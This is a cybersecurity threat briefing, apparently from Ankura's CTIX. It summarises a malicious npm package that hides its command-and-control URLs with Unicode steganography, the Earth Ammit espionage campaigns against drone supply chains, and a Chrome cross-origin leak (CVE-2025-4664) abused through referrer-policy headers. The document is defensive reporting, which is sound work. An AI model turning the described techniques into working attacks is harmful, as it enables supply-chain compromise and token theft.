Malware Activity
Malicious npm Package Evades Detection and Delivers Sophisticated Multi-Stage Payload
Researchers have uncovered a sophisticated malware campaign involving a malicious npm package named "os-info-checker-es6", which poses as a system utility but stealthily delivers a multi-stage payload using advanced obfuscation and command-and-control (C2) evasion techniques. First published on March 19, 2025, the package was initially benign but evolved significantly by May 7, with version 1.0.8 introducing Unicode-based steganography to hide a C2 mechanism that leverages Google Calendar short links as dead drop resolvers. The malicious code uses invisible Unicode Variation Selectors to conceal base64-encoded URLs, which are extracted from Google Calendar event metadata, decoded, and executed via eval(), potentially with encrypted payloads using HTTP headers for keys. The package also includes a simple persistence mechanism to avoid multiple instances. Additionally, it is listed as a dependency in four (4) other suspicious packages (skip-tot, vue-dev-serverr, vue-dummyy, and vue-bit0 which masquerade as development tools. Although the final payload was not retrievable during analysis, suggesting the campaign may be dormant or selectively active, the continued availability of these packages on npm highlights the persistent risk posed by software supply chain attacks. CTIX analysts will continue to report on the latest malware strains and attacker tactics, techniques, and procedures (TTPs).
Threat Actor Activity
Chinese-linked Earth Ammit Targeting Drone Supply Chains and Other Military Components
The cyber espionage group known as Earth Ammit has been linked to two (2) related campaigns, VENOM and TIDRONE, targeting various sectors in Taiwan and South Korea between 2023 and 2024. These campaigns, attributed to Chinese-speaking nation-state actors, aimed at compromising the drone supply chain and other critical sectors such as military, satellite, heavy industry, media, technology, software services, and healthcare. The VENOM campaign primarily targeted software service providers in Taiwan and heavy industry firms in South Korea by exploiting web server vulnerabilities to deploy web shells and remote access tools. This allowed Earth Ammit to harvest credentials and set the stage for the subsequent TIDRONE campaign. VENOM's use of open-source tools like REVSOCK and Sliver was a deliberate attempt to obscure attribution. The TIDRONE campaign focused on the military industry, particularly drone manufacturers. It involved three (3) stages: initial access through service providers, command-and-control using DLL loaders to drop CXCLNT and CLNTEND backdoors, and post-exploitation activities like privilege escalation and information collection. These campaigns demonstrated Earth Ammit's strategy of infiltrating upstream segments of the supply chain to target downstream customers, causing broad global consequences. The connection between VENOM and TIDRONE is evident through shared victims, service providers, and command-and-control infrastructure, suggesting a common threat actor behind both campaigns. The tactics, techniques, and procedures (TTPs) resemble those used by another Chinese nation-state hacking group, Dalbit, indicating a shared toolkit.
Vulnerabilities
Chrome Vulnerability with PoC Cross-Origin Data Leak Exploit Receives Patch
Google has released urgent security updates to addressa high-severity vulnerability in the Chrome browser that is being actively exploited in the wild. The flaw, tracked as CVE-2025-4664, was discovered by Solidlab security researcher Vsevolod Kokorin, and stems from insufficient policy enforcement in Chrome’s Loader component and allows remote attackers to leak cross-origin data through maliciously crafted HTML pages. By manipulating the Link header to set a referrer-policy of unsafe-url, attackers can exfiltrate sensitive query parameters (like as OAuth tokens) via third-party images, potentially leading to full account takeover. While it's unclear if the vulnerability has been widely abused beyond proof-of-concept (PoC) demonstrations, Google has acknowledged public exploitation reports and urged users to update Chrome immediately. The patched versions (136.0.7103.113 for Windows and Linux, and 136.0.7103.114 for macOS) are now available, with automatic updates rolling out. Users of other Chromium-based browsers like Edge, Brave, Opera, and Vivaldi are also advised to apply patches once available. This marks the second actively exploited Chrome vulnerability in 2025, following CVE-2025-2783, which was linked to espionage attacks targeting Russian organizations. CTIX analysts recommend that all users utilizing Chrome and Chromium-based browsers ensure that their instances are up to date on their browser versions to prevent exploitation.
📧 Never Miss a Briefing
Stay informed and secure. Subscribe to Ankura's Cyber Flash Update, a bi-weekly briefing curated by our top cybersecurity experts. Receive timely insights on emerging threats, vulnerabilities and malicious actors to keep your systems secure.
Join the Cyber Flash Update community today.
© Copyright 2025. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
